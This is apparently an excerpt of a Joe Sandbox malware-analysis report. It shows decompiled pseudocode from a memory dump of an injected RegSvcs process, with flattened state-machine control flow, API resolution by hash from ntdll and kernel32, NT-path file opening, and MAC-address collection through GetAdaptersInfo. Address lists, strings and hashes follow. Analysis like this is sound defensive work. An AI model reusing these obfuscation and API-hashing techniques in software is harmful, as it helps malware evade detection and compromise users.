							if(_t259 < 0x7c) {
								_t140 = 0x1ab0e90e;
							}
							goto L163;
						}
					}
					if(_t137 <= 0x17dbd9f6) {
						if(_t137 == 0xda8ad0d) {
							 *_t306 = 0x614631bb;
						} else {
							if(_t137 == 0xeec6e15) {
								 *_t306 = 0x99952f51;
								_t305 = 0;
							} else {
								if(_t137 == 0x16135bf7) {
									_v248 = (_v248 << 0x00000009 & 0x3ffffe00 | 0x000000e1) * 0xc6;
									 *_t306 = 0xd7df6f29;
								}
							}
						}
						continue;
					}
					if(_t137 > 0x1ab0e90d) {
						if(_t137 == 0x1ab0e90e) {
							_push( &_v144);
							_push(0x800);
							E00443437(_v232);
							_t306 = _t306 + 0xc;
							_t304 =  *_v236;
							_t140 = 0x66024f5d;
							if(_t304 != 0) {
								_t140 = 0xd91beb26;
							}
							goto L163;
						}
						if(_t137 == 0x204b3ed8) {
							_v224 = 0;
							 *_t306 = 0x17dbd9f7;
						}
					} else {
						if(_t137 == 0x17dbd9f7) {
							 *_t306 = 0xe88c259a;
						} else {
							if(_t137 == 0x191d7f5e) {
								_v148 = _v240;
								 *_t306 = 0x4861e6c3;
							}
						}
					}
				}
			}

0x0041dad4
0x0041dada
0x0041dae5
0x0041daed
0x0041daf1
0x0041daf5
0x0041daf9
0x0041dafd
0x0041dafd
0x0041db05
0x0041db05
0x0041db07
0x0041db0c
0x0041dbe0
0x0041dd6d
0x0041df82
0x0041e4ca
0x0041e4d0
0x0041e4d4
0x0041e4d9
0x0041e4de
0x0041e4e5
0x0041e5f5
0x0041e5f5
0x00000000
0x0041e5f5
0x0041e4eb
0x0041e4eb
0x00000000
0x0041e4eb
0x0041df8d
0x0041e504
0x0041e509
0x0041e511
0x0041e515
0x0041df93
0x0041df98
0x0041dfa8
0x0041dfac
0x0041dfac
0x0041df98
0x00000000
0x0041dd73
0x0041dd78
0x0041e15a
0x0041e61f
0x0041e623
0x0041e628
0x0041e62b
0x0041e62f
0x0041e160
0x0041e165
0x0041e173
0x0041e17c
0x0041e181
0x0041e181
0x0041e165
0x0041dd7e
0x0041dd83
0x0041e2ce
0x0041e2d2
0x0041e2d9
0x0041dd89
0x0041dd8e
0x0041dd94
0x0041dd99
0x0041dd9b
0x0041dda0
0x0041dda3
0x0041dda7
0x0041dda7
0x0041dd8e
0x0041dd83
0x0041dafd
0x0041dafd
0x0041db05
0x0041db05
0x00000000
0x0041db05
0x00000000
0x0041dafd
0x0041dd6d
0x0041dbeb
0x0041de8d
0x0041e346
0x0041e34c
0x0041e350
0x0041e35b
0x0041e361
0x0041e361
0x00000000
0x0041e35b
0x0041de98
0x0041e36b
0x0041e375
0x0041e37e
0x0041e385
0x0041e389
0x0041e390
0x0041e396
0x0041e396
0x00000000
0x0041e390
0x0041dea3
0x00000000
0x0041dea9
0x0041dea9
0x0041deb7
0x0041dec3
0x0041decf
0x0041ded3
0x0041deda
0x0041dee0
0x0041dee0
0x00000000
0x0041deda
0x0041dea3
0x0041dbf6
0x0041e068
0x0041e5a9
0x0041e5ad
0x0041e06e
0x0041e073
0x0041e079
0x0041e079
0x0041e073
0x00000000
0x0041e068
0x0041dc01
0x0041e22c
0x0041e232
0x0041e236
0x0041e241
0x0041e247
0x0041e247
0x00000000
0x0041dc07
0x0041dc0c
0x0041dc19
0x0041dc1e
0x0041dc2c
0x0041dc2d
0x0041dc31
0x0041dc38
0x0041dc3a
0x0041dc3a
0x0041dc3f
0x0041dc42
0x0041dc42
0x00000000
0x0041dc0c
0x0041dc01
0x0041db17
0x0041dcb5
0x0041df24
0x0041e3ef
0x0041e3f2
0x0041e3f6
0x0041e3fb
0x0041e414
0x0041e419
0x0041e41c
0x0041e424
0x00000000
0x00000000
0x00000000
0x0041e42a
0x0041df2f
0x0041e42f
0x0041e438
0x0041e43e
0x0041e442
0x0041df35
0x0041df3a
0x0041df40
0x0041df44
0x0041df44
0x0041df3a
0x00000000
0x0041df2f
0x0041dcc0
0x0041e0ca
0x0041e5cc
0x0041e5d1
0x0041e5da
0x0041e5e3
0x0041e5e7
0x0041e5ee
0x0041e5f0
0x0041e5f0
0x00000000
0x0041e5ee
0x0041e0d5
0x00000000
0x00000000
0x0041e0ed
0x0041e0f3
0x0041e0f7
0x0041e0fc
0x0041e103
0x0041e109
0x0041e109
0x00000000
0x0041e103
0x0041dccb
0x0041e27d
0x00000000
0x0041e27d
0x0041dcd6
0x00000000
0x0041dcdc
0x0041dce1
0x0041dce9
0x0041dced
0x0041dcf8
0x0041dcfe
0x0041dcfe
0x00000000
0x0041dcf8
0x0041dcd6
0x0041db22
0x0041de05
0x0041e1ca
0x0041e64c
0x00000000
0x00000000
0x0041e652
0x0041e656
0x0041e65e
0x0041e662
0x0041e666
0x0041e66a
0x0041e67a
0x0041e67a
0x0041e1d5
0x0041e1da
0x0041e1e0
0x0041e1e0
0x00000000
0x0041e1da
0x0041de10
0x0041e2fc
0x0041e2ff
0x0041e303
0x0041e30e
0x0041e314
0x0041e314
0x00000000
0x0041de16
0x0041de1b
0x0041de25
0x0041de2d
0x0041de2f
0x0041de2f
0x0041de34
0x0041de37
0x0041de37
0x00000000
0x0041de1b
0x0041db28
0x0041db2d
0x0041dffa
0x0041e571
0x0041e000
0x0041e005
0x0041e01b
0x0041e029
0x0041e02d
0x0041e02d
0x0041e005
0x0041db33
0x0041db38
0x0041e1f1
0x0041e1f6
0x0041e1fa
0x0041e1ff
0x0041e200
0x0041e205
0x0041e20a
0x0041e20d
0x0041db3e
0x0041db43
0x0041db45
0x0041db4c
0x0041db56
0x0041db5f
0x0041db64
0x0041db66
0x0041db66
0x0041db6e
0x0041db70
0x0041db70
0x0041db75
0x0041db78
0x0041db78
0x0041db43
0x0041db38
0x00000000
0x0041db2d
0x0041db85
0x0041db8a
0x0041dc50
0x0041ddb8
0x0041dfbd
0x0041e529
0x0041e52f
0x0041e533
0x0041e538
0x0041e53d
0x0041e545
0x0041e54b
0x0041e54b
0x00000000
0x0041e545
0x0041dfc8
0x0041e561
0x0041e565
0x0041dfce
0x0041dfd3
0x0041dfe5
0x0041dfe9
0x0041dfe9
0x0041dfd3
0x0041ddbe
0x0041ddc3
0x0041e192
0x0041e63b
0x0041e198
0x0041e19d
0x0041e1a3
0x0041e1a8
0x0041e1b1
0x0041e1b6
0x0041e1b9
0x0041e1b9
0x0041e19d
0x0041ddc9
0x0041ddce
0x0041e2e2
0x0041e2e6
0x0041ddd4
0x0041ddd9
0x0041dde4
0x0041dde9
0x0041ddeb
0x0041ddeb
0x0041ddf0
0x0041ddf3
0x0041ddf3
0x0041ddd9
0x0041ddce
0x0041ddc3
0x00000000
0x0041ddb8
0x0041dc5b
0x0041deef
0x0041e3a4
0x0041e3a9
0x0041e3ac
0x0041e3b7
0x0041def5
0x0041defa
0x0041e3d7
0x0041e3db
0x0041df00
0x0041df05
0x0041df0b
0x0041df16
0x0041df16
0x0041df05
0x0041defa
0x00000000
0x0041deef
0x0041dc66
0x0041e08a
0x0041e5b9
0x0041e090
0x0041e095
0x0041e0ab
0x0041e0b5
0x0041e0b9
0x0041e0b9
0x0041e095
0x00000000
0x0041e08a
0x0041dc71
0x0041e258
0x0041e25e
0x0041e262
0x0041e26d
0x0041e273
0x0041e273
0x00000000
0x0041e26d
0x0041dc7c
0x00000000
0x0041dc82
0x0041dc86
0x0041dc89
0x0041dc8f
0x0041dc98
0x0041dc99
0x0041dca0
0x0041dca6
0x0041dca6
0x00000000
0x0041dca0
0x0041dc7c
0x0041db95
0x0041dd0d
0x0041df55
0x0041e45d
0x0041e462
0x0041e46a
0x0041e472
0x0041e47a
0x0041e480
0x0041e480
0x00000000
0x0041e47a
0x0041df60
0x0041e493
0x0041e49a
0x0041e49e
0x0041e4a3
0x0041e4a8
0x0041e4b3
0x0041e4b9
0x0041e4b9
0x00000000
0x0041e4b3
0x0041df6b
0x0041df71
0x0041df71
0x00000000
0x0041df6b
0x0041dd18
0x0041e118
0x0041e609
0x0041e60e
0x0041e611
0x0041e618
0x0041e11e
0x0041e123
0x0041e12d
0x0041e12e
0x0041e137
0x0041e13c
0x0041e145
0x0041e149
0x0041e149
0x0041e123
0x00000000
0x0041e118
0x0041dd23
0x0041e292
0x0041e296
0x0041e29f
0x0041e2a6
0x0041e2aa
0x0041e2b1
0x0041e2b7
0x0041e2b7
0x00000000
0x0041e2b1
0x0041dd2e
0x00000000
0x0041dd34
0x0041dd3c
0x0041dd42
0x0041dd4b
0x0041dd50
0x0041dd58
0x0041dd5e
0x0041dd5e
0x00000000
0x0041dd58
0x0041dd2e
0x0041dba0
0x0041de45
0x0041e31e
0x0041de4b
0x0041de50
0x0041e32a
0x0041e331
0x0041de56
0x0041de5b
0x0041de78
0x0041de7c
0x0041de7c
0x0041de5b
0x0041de50
0x00000000
0x0041de45
0x0041dbab
0x0041e03e
0x0041e581
0x0041e582
0x0041e58b
0x0041e590
0x0041e597
0x0041e599
0x0041e5a0
0x0041e5a2
0x0041e5a2
0x00000000
0x0041e5a0
0x0041e049
0x0041e04f
0x0041e057
0x0041e057
0x0041dbb1
0x0041dbb6
0x0041e219
0x0041dbbc
0x0041dbc1
0x0041dbcb
0x0041dbcf
0x0041dbcf
0x0041dbc1
0x0041dbb6
0x0041dbab

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0041DB4C

Strings

\&T!, xrefs: 0041E303
vYh, xrefs: 0041E0D0
\&T!, xrefs: 0041DF50
vYh, xrefs: 0041E41C
\&T!, xrefs: 0041E4DE
\&T!, xrefs: 0041E247
%02X, xrefs: 0041E452, 0041E4F9
[&T!, xrefs: 0041DB90

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: AdaptersInfo
String ID: %02X$[&T!$\&T!$\&T!$\&T!$\&T!$vYh$vYh
API String ID: 3177971545-1388682554
Opcode ID: 24466aa8723a58159b64dc0a71ad07cc715bdfc8399c01aa25ee75e9b7ec0abb
Instruction ID: 59ed935779552754df3ba8a020872cc0766769a7d87340258dc8d195c73b1877
Opcode Fuzzy Hash: 24466aa8723a58159b64dc0a71ad07cc715bdfc8399c01aa25ee75e9b7ec0abb
Instruction Fuzzy Hash: F332C3B490C3409BCB28DF5DC5916AEB6E0AF94344F248C6FE496CB360D678D8C59B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00409F24 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 444
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E00409F24(intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				short* _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				WCHAR* _v40;
				char _v44;
				signed int _v46;
				signed int _v48;
				short* _v52;
				WCHAR* _v56;
				char _v57;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v80;
				WCHAR* _t94;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed int _t113;
				intOrPtr _t125;
				intOrPtr* _t136;
				signed int _t138;
				signed int _t146;
				signed int _t153;
				intOrPtr _t172;
				WCHAR* _t173;
				intOrPtr _t175;
				WCHAR* _t178;
				signed int _t180;
				signed int _t188;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t213;
				signed int _t215;
				signed int* _t217;
				void* _t221;
				intOrPtr* _t222;

				_t199 = __edx;
				_push(2);
				_push(0x104);
				_t94 = E0043EBC9();
				_t222 = _t221 + 8;
				_v40 = _t94;
				 *_t222 = 0x204b3ed8;
				_t178 = L"ntdll.dll";
				while(1) {
					_t95 =  *_t222;
					if(_t95 > 0x17dbd9f6) {
						goto L8;
					}
					L2:
					if(_t95 > 0xd91beb25) {
						__eflags = _t95 - 0xf2bf8b36;
						if(_t95 > 0xf2bf8b36) {
							__eflags = _t95 - 0xda8ad0c;
							if(_t95 > 0xda8ad0c) {
								__eflags = _t95 - 0xda8ad0d;
								if(_t95 == 0xda8ad0d) {
									_v68 = _v68 << 0x00000004 & 0x0001f000;
									 *_t222 = 0xbe8bd9a0;
								} else {
									__eflags = _t95 - 0xeec6e15;
									if(__eflags == 0) {
										_t146 = _v72 + 0xffffff35 >> 0xe;
										_t206 = (_t146 << 5) + _t146 * 2 + 0x1254;
										_v72 = (_t146 << 5) + _t146 * 2 + 0x1254;
										E0040AACC(_t199, __eflags, (_t146 << 5) + _t146 * 2 + 0x1254);
										E0040A6C7(0x2dda, 0x47ad, _t206);
										_t222 = _t222 + 0x10;
										 *_t222 = 0xca7d9612;
									}
								}
								while(1) {
									_t95 =  *_t222;
									if(_t95 > 0x17dbd9f6) {
										goto L8;
									}
									goto L2;
								}
								goto L8;
							}
							__eflags = _t95 - 0xf2bf8b37;
							if(__eflags == 0) {
								_t210 = (_v72 >> 0xb) + 0x1a >> 0x14;
								_v72 = (_v72 >> 0xb) + 0x1a >> 0x14;
								E00409F24(_t199, __eflags, (_v72 >> 0xb) + 0x1a >> 0x14);
								E0040A6C7(0x3b19, _t210, 0x7f9);
								_t222 = _t222 + 0x10;
								 *_t222 = 0x709e7a25;
								continue;
							}
							__eflags = _t95 - 0x64d2d51;
							if(_t95 == 0x64d2d51) {
								_t213 = _v72 >> 0x00000005 & 0xfffffff0;
								_v72 = _t213;
								E0040A6C7(0x2ce5, 0x1f83, _t213);
								_t222 = _t222 + 0xc;
								_t101 = 0x374a509b;
								__eflags = _t213 - 0xab;
								if(_t213 < 0xab) {
									_t101 = 0xc92049e7;
								}
								L86:
								 *_t222 = _t101;
							}
							continue;
						}
						__eflags = _t95 - 0xe3a20263;
						if(_t95 > 0xe3a20263) {
							__eflags = _t95 - 0xe3a20264;
							if(_t95 == 0xe3a20264) {
								_t153 = _v68 + 0xffffffba;
								_t188 = _t153 * _t153;
								_t199 = _t188 * 0x79e1 - 1;
								_v68 = (_t153 << 0x00000008 & 0x007fff00) + 0xffffff17;
								_t101 = 0xd91beb26;
								__eflags = _t188 - _t188 * 0x79e1 - 1;
								if(_t188 == _t188 * 0x79e1 - 1) {
									goto L86;
								}
								L82:
								_t101 = 0xd7df6f29;
								goto L86;
							}
							__eflags = _t95 - 0xe88c259a;
							if(_t95 == 0xe88c259a) {
								_v44 = 0;
								 *_t222 = 0x359a4a84;
							}
							continue;
						}
						__eflags = _t95 - 0xd91beb26;
						if(_t95 == 0xd91beb26) {
							_t190 = 0x8918 + _v72 * 0x6b;
							_v72 = _t190;
							_t101 = 0x359a4a84;
							__eflags = _t190 - 0x80;
							if(_t190 != 0x80) {
								_t101 = 0x934be26f;
							}
							goto L86;
						}
						__eflags = _t95 - 0xdee81455;
						if(_t95 != 0xdee81455) {
							continue;
						} else {
							_t215 = (_v72 >> 0x0000000d) * 0x0012a000 | 0x00000098;
							_v72 = _t215;
							E0040AAFD(_t199, 0x5870, _t215, 0x4445, 0x7eb);
							E0040A6C7(0x1f46, 0xbaa, _t215);
							_t222 = _t222 + 0x1c;
							_t101 = 0xca7d9612;
							__eflags = _t215 - 0x6a;
							if(_t215 >= 0x6a) {
								_t101 = 0x17dbd9f7;
							}
							goto L86;
						}
					}
					if(_t95 <= 0xb215b34f) {
						__eflags = _t95 - 0x99952f50;
						if(_t95 > 0x99952f50) {
							__eflags = _t95 - 0x99952f51;
							if(_t95 == 0x99952f51) {
								_t180 = 0x3c + _v72 * 0xc2;
								_v72 = _t180;
								_t101 = 0x603edea5;
								__eflags = _t180 - 0x16;
								if(_t180 < 0x16) {
									_t101 = 0xf2bf8b37;
								}
								goto L86;
							}
							__eflags = _t95 - 0x9a29c658;
							if(_t95 == 0x9a29c658) {
								 *_v24 = _v46 & 0x0000ffff;
								 *((intOrPtr*)(_v52 + 4)) = _v56;
								 *_v64 = 0x18;
								 *_t222 = 0x1ab0e90e;
							}
						} else {
							__eflags = _t95 - 0x8a7477c9;
							if(_t95 == 0x8a7477c9) {
								 *_v52 = (_v48 & 0x0000ffff) + (_v48 & 0x0000ffff);
								_v28 = lstrlenW(_v56);
								 *_t222 = 0x435e3da1;
							} else {
								__eflags = _t95 - 0x934be26f;
								if(_t95 == 0x934be26f) {
									_v72 = (_v72 >> 0x00000003 & 0x1ffff000) * 0x000000ab | 0x0000006d;
									 *_t222 = 0xe88c259a;
								}
							}
						}
						continue;
					}
					if(_t95 > 0xca7d9611) {
						__eflags = _t95 - 0xca7d9612;
						if(_t95 == 0xca7d9612) {
							_push(1);
							_push(0x18);
							_t172 = E0043EBC9();
							_t222 = _t222 + 8;
							_v64 = _t172;
							 *_t222 = 0xe3a20264;
						} else {
							__eflags = _t95 - 0xd7df6f29;
							if(_t95 == 0xd7df6f29) {
								_push(2);
								_push(0x118);
								_t173 = E0043EBC9();
								_t222 = _t222 + 8;
								_v56 = _t173;
								lstrcatW(_v56, L"\\??\\");
								 *_t222 = 0x5577d6d4;
							}
						}
						continue;
					}
					if(_t95 == 0xbe8bd9a0) {
						__eflags = _v36;
						_v57 = _v36 > 0;
						 *_t222 = 0x614631bb;
						continue;
					}
					if(_t95 != 0xc92049e7) {
						__eflags = _t95 - 0xb215b350;
						if(_t95 != 0xb215b350) {
							continue;
						}
						__eflags = _v57;
						_t175 = _v20;
						if(_v57 != 0) {
							return _t175;
						}
						__eflags = 0;
						return 0;
					} else {
						_v48 = lstrlenW(_v56);
						 *_t222 = 0x8a7477c9;
						continue;
					}
					L8:
					__eflags = _t95 - 0x5577d6d3;
					if(_t95 > 0x5577d6d3) {
						__eflags = _t95 - 0x6fa4c2e3;
						if(_t95 > 0x6fa4c2e3) {
							__eflags = _t95 - 0x71c5912d;
							if(_t95 > 0x71c5912d) {
								__eflags = _t95 - 0x71c5912e;
								if(_t95 == 0x71c5912e) {
									_v68 = _v68 + _v68 + 0xffffff2f;
									 *_t222 = 0xc92049e7;
									continue;
								}
								__eflags = _t95 - 0x79499e71;
								if(_t95 != 0x79499e71) {
									continue;
								}
								_t192 = 0xffffffa6 + (_v72 >> 1) * 0xc5;
								_v72 = _t192;
								_t101 = 0xeec6e15;
								__eflags = _t192 - 0x2e;
								if(_t192 < 0x2e) {
									goto L82;
								}
								goto L86;
							} else {
								__eflags = _t95 - 0x6fa4c2e4;
								if(_t95 == 0x6fa4c2e4) {
									 *((intOrPtr*)(_v64 + 8)) = _v52;
									 *((intOrPtr*)(_v64 + 0x10)) = 0;
									 *((intOrPtr*)(_v64 + 0x14)) = 0;
									_t105 = E0042EEA4(0xb5ca9f40, _t178);
									_v80 =  *_t105( &_v44, 0x120089, _v64, _v32, 0, 0x80, 3, 1, 0x20, 0, 0);
									_t107 = E0042EEA4(0x77bf809f, _t178);
									_t222 = _t222 + 0x10;
									 *_t107(_v80);
									 *_t222 = 0xda8ad0d;
								} else {
									__eflags = _t95 - 0x709e7a25;
									if(_t95 == 0x709e7a25) {
										lstrcatW(_v56, _v40);
										 *_t222 = 0x71c5912e;
									}
								}
								continue;
							}
						}
						__eflags = _t95 - 0x603edea4;
						if(_t95 > 0x603edea4) {
							__eflags = _t95 - 0x603edea5;
							if(_t95 == 0x603edea5) {
								_v72 = 0x817 + _v72 * 8;
								 *_t222 = 0xd7df6f29;
							} else {
								__eflags = _t95 - 0x614631bb;
								if(_t95 == 0x614631bb) {
									_v20 = _v44;
									 *_t222 = 0x2154265c;
								}
							}
							continue;
						}
						__eflags = _t95 - 0x5577d6d4;
						if(_t95 == 0x5577d6d4) {
							_t113 = _v68;
							_t196 = (_t113 + 0xd9) * (_t113 + 0xd9);
							_t199 = _t196 * 0x54b7 - 1;
							_v68 = _t113 + 0xf6 >> 4;
							_t101 = 0x359a4a84;
							__eflags = _t196 - _t196 * 0x54b7 - 1;
							if(_t196 != _t196 * 0x54b7 - 1) {
								_t101 = 0x709e7a25;
							}
							goto L86;
						} else {
							__eflags = _t95 - 0x5b1bebb4;
							if(_t95 == 0x5b1bebb4) {
								 *((intOrPtr*)(_v64 + 4)) = 0;
								 *((intOrPtr*)(_v64 + 0xc)) = 0x40;
								 *_t222 = 0x6fa4c2e4;
							}
							continue;
						}
					}
					__eflags = _t95 - 0x359a4a83;
					if(_t95 > 0x359a4a83) {
						__eflags = _t95 - 0x435e3da0;
						if(_t95 > 0x435e3da0) {
							__eflags = _t95 - 0x435e3da1;
							if(_t95 == 0x435e3da1) {
								_v46 = _v28 + _v28 + 2;
								_v24 = _v52 + 2;
								 *_t222 = 0x9a29c658;
								continue;
							}
							__eflags = _t95 - 0x4616c898;
							if(_t95 != 0x4616c898) {
								continue;
							}
							_t217 = _v72 + 0xffffff8f;
							_v72 = _t217;
							E0040AAFD(_t199, 0x2502, 0x3926, 0xb5b, _t217);
							_t222 = _t222 + 0x10;
							_t101 = 0x64d2d51;
							__eflags = _t217 - 0x5f;
							if(_t217 < 0x5f) {
								_t101 = 0x99952f51;
							}
							goto L86;
						} else {
							__eflags = _t95 - 0x359a4a84;
							if(_t95 == 0x359a4a84) {
								_push(1);
								_push(8);
								_v52 = E0043EBC9();
								_push(1);
								_push(8);
								_t125 = E0043EBC9();
								_t222 = _t222 + 0x10;
								_v32 = _t125;
								 *_t222 = 0xca7d9612;
							} else {
								__eflags = _t95 - 0x374a509b;
								if(_t95 == 0x374a509b) {
									_v72 = (_v72 << 0xa) + 0xffffff17 >> 0xe;
									 *_t222 = 0x5b1bebb4;
								}
							}
							continue;
						}
					}
					__eflags = _t95 - 0x204b3ed7;
					if(_t95 > 0x204b3ed7) {
						__eflags = _t95 - 0x204b3ed8;
						if(_t95 == 0x204b3ed8) {
							 *_t222 = 0x17dbd9f7;
						} else {
							__eflags = _t95 - 0x2154265c;
							if(_t95 == 0x2154265c) {
								_v68 = 0xe9 + (_v68 + 0x55 >> 0xe) * 0xf4 >> 0xd;
								 *_t222 = 0xb215b350;
							}
						}
						continue;
					}
					__eflags = _t95 - 0x17dbd9f7;
					if(_t95 == 0x17dbd9f7) {
						_t136 = E0042EEA4(0x7328f505, L"kernel32.dll");
						_t222 = _t222 + 8;
						 *_t136(_a4, _v40, 0x104);
						 *_t222 = 0xe88c259a;
						continue;
					}
					__eflags = _t95 - 0x1ab0e90e;
					if(_t95 != 0x1ab0e90e) {
						continue;
					} else {
						_t138 = _v68;
						_t197 = _t138 + 0x11a;
						_t198 = _t197 * _t197;
						_t199 = _t198 * 0x827d - 1;
						_v68 = _t138 + (_t197 + _t197 * 8) * 4 + 0x11a;
						_t101 = 0xdee81455;
						__eflags = _t198 - _t198 * 0x827d - 1;
						if(_t198 != _t198 * 0x827d - 1) {
							_t101 = 0x5b1bebb4;
						}
						goto L86;
					}
				}
			}

0x00409f24
0x00409f2b
0x00409f2d
0x00409f32
0x00409f37
0x00409f3a
0x00409f3e
0x00409f4c
0x00409f51
0x00409f51
0x00409f59
0x00000000
0x00000000
0x00409f5b
0x00409f60
0x0040a01b
0x0040a020
0x0040a175
0x0040a17a
0x0040a377
0x0040a37c
0x0040a67c
0x0040a680
0x0040a382
0x0040a382
0x0040a387
0x0040a398
0x0040a3a3
0x0040a3a9
0x0040a3ae
0x0040a3c1
0x0040a3c6
0x0040a3c9
0x0040a3c9
0x0040a387
0x00409f51
0x00409f51
0x00409f59
0x00000000
0x00000000
0x00000000
0x00409f59
0x00000000
0x00409f51
0x0040a180
0x0040a185
0x0040a512
0x0040a515
0x0040a51a
0x0040a52d
0x0040a532
0x0040a535
0x00000000
0x0040a535
0x0040a18b
0x0040a190
0x0040a19d
0x0040a1a0
0x0040a1af
0x0040a1b4
0x0040a1b7
0x0040a1bc
0x0040a1c2
0x0040a1c8
0x0040a1c8
0x0040a643
0x0040a643
0x0040a643
0x00000000
0x0040a190
0x0040a026
0x0040a02b
0x0040a28f
0x0040a294
0x0040a5da
0x0040a5df
0x0040a5e8
0x0040a5f6
0x0040a5fa
0x0040a5ff
0x0040a601
0x00000000
0x00000000
0x0040a603
0x0040a603
0x00000000
0x0040a603
0x0040a29a
0x0040a29f
0x0040a2a5
0x0040a2ad
0x0040a2ad
0x00000000
0x0040a29f
0x0040a031
0x0040a036
0x0040a459
0x0040a45f
0x0040a463
0x0040a468
0x0040a46e
0x0040a474
0x0040a474
0x00000000
0x0040a46e
0x0040a03c
0x0040a041
0x00000000
0x0040a047
0x0040a054
0x0040a05a
0x0040a06e
0x0040a081
0x0040a086
0x0040a089
0x0040a08e
0x0040a091
0x0040a097
0x0040a097
0x00000000
0x0040a091
0x0040a041
0x00409f6b
0x0040a0ef
0x0040a0f4
0x0040a2e3
0x0040a2e8
0x0040a62d
0x0040a630
0x0040a634
0x0040a639
0x0040a63c
0x0040a63e
0x0040a63e
0x00000000
0x0040a63c
0x0040a2ee
0x0040a2f3
0x0040a302
0x0040a30d
0x0040a314
0x0040a31a
0x0040a31a
0x0040a0fa
0x0040a0fa
0x0040a0ff
0x0040a4c0
0x0040a4cd
0x0040a4d1
0x0040a105
0x0040a105
0x0040a10a
0x0040a125
0x0040a129
0x0040a129
0x0040a10a
0x0040a0ff
0x00000000
0x0040a0f4
0x00409f76
0x0040a20d
0x0040a212
0x0040a5ae
0x0040a5b0
0x0040a5b2
0x0040a5b7
0x0040a5ba
0x0040a5be
0x0040a218
0x0040a218
0x0040a21d
0x0040a223
0x0040a225
0x0040a22a
0x0040a22f
0x0040a232
0x0040a23f
0x0040a245
0x0040a245
0x0040a21d
0x00000000
0x0040a212
0x00409f81
0x0040a411
0x0040a416
0x0040a41b
0x00000000
0x0040a41b
0x00409f8c
0x0040a6a7
0x0040a6ac
0x00000000
0x00000000
0x0040a6b2
0x0040a6b7
0x0040a6bb
0x0040a6c6
0x0040a6c6
0x0040a6bd
0x00000000
0x00409f92
0x00409f9c
0x00409fa1
0x00000000
0x00409fa1
0x00409faa
0x00409faa
0x00409faf
0x0040a0a1
0x0040a0a6
0x0040a1d2
0x0040a1d7
0x0040a3d5
0x0040a3da
0x0040a697
0x0040a69b
0x00000000
0x0040a69b
0x0040a3e0
0x0040a3e5
0x00000000
0x00000000
0x0040a3f7
0x0040a3fa
0x0040a3fe
0x0040a403
0x0040a406
0x00000000
0x00000000
0x00000000
0x0040a1dd
0x0040a1dd
0x0040a1e2
0x0040a549
0x0040a550
0x0040a557
0x0040a560
0x0040a58a
0x0040a594
0x0040a599
0x0040a5a0
0x0040a5a2
0x0040a1e8
0x0040a1e8
0x0040a1ed
0x0040a1fb
0x0040a201
0x0040a201
0x0040a1ed
0x00000000
0x0040a1e2
0x0040a1d7
0x0040a0ac
0x0040a0b1
0x0040a2b9
0x0040a2be
0x0040a615
0x0040a619
0x0040a2c4
0x0040a2c4
0x0040a2c9
0x0040a2d3
0x0040a2d7
0x0040a2d7
0x0040a2c9
0x00000000
0x0040a2be
0x0040a0b7
0x0040a0bc
0x0040a47e
0x0040a488
0x0040a496
0x0040a49a
0x0040a49e
0x0040a4a3
0x0040a4a5
0x0040a4ab
0x0040a4ab
0x00000000
0x0040a0c2
0x0040a0c2
0x0040a0c7
0x0040a0d1
0x0040a0dc
0x0040a0e3
0x0040a0e3
0x00000000
0x0040a0c7
0x0040a0bc
0x00409fb5
0x00409fba
0x0040a135
0x0040a13a
0x0040a326
0x0040a32b
0x0040a654
0x0040a660
0x0040a664
0x00000000
0x0040a664
0x0040a331
0x0040a336
0x00000000
0x00000000
0x0040a340
0x0040a343
0x0040a357
0x0040a35c
0x0040a35f
0x0040a364
0x0040a367
0x0040a36d
0x0040a36d
0x00000000
0x0040a140
0x0040a140
0x0040a145
0x0040a4e0
0x0040a4e1
0x0040a4ea
0x0040a4ee
0x0040a4ef
0x0040a4f0
0x0040a4f5
0x0040a4f8
0x0040a4fc
0x0040a14b
0x0040a14b
0x0040a150
0x0040a165
0x0040a169
0x0040a169
0x0040a150
0x00000000
0x0040a145
0x0040a13a
0x00409fc0
0x00409fc5
0x0040a251
0x0040a256
0x0040a5ca
0x0040a25c
0x0040a25c
0x0040a261
0x0040a27f
0x0040a283
0x0040a283
0x0040a261
0x00000000
0x0040a256
0x00409fcb
0x00409fd0
0x0040a431
0x0040a436
0x0040a446
0x0040a448
0x00000000
0x0040a448
0x00409fd6
0x00409fdb
0x00000000
0x00409fe1
0x00409fe1
0x00409fe5
0x00409fee
0x00409fff
0x0040a000
0x0040a004
0x0040a009
0x0040a00b
0x0040a011
0x0040a011
0x00000000
0x0040a00b
0x00409fdb

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040AAD6,0040A8A8,?), ref: 00409F96
lstrcatW.KERNEL32(?,?), ref: 0040A1FB
lstrcatW.KERNEL32(?,\??\), ref: 0040A23F

Strings

\??\, xrefs: 0040A236
kernel32.dll, xrefs: 0040A427
ntdll.dll, xrefs: 00409F4C, 0040A55A, 0040A58E
\&T!, xrefs: 0040A25C

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcat$lstrlen
String ID: \&T!$\??\$kernel32.dll$ntdll.dll
API String ID: 751011610-3610757783
Opcode ID: 522c5251b88015c9ccc88dcd07b7e3e0186c938f0d1fafa55799df964a5b2100
Instruction ID: 15d9ffc0bf8dc75b2a5597e42a53c8777e36086ab371a799d0b1de09a95825f8
Opcode Fuzzy Hash: 522c5251b88015c9ccc88dcd07b7e3e0186c938f0d1fafa55799df964a5b2100
Instruction Fuzzy Hash: 98F1D371A0C3019BCB64AF14C845A2EBAE0AF94310F14483FF599EB3E1D279D9959B4F

Uniqueness

Uniqueness Score: -1.00%

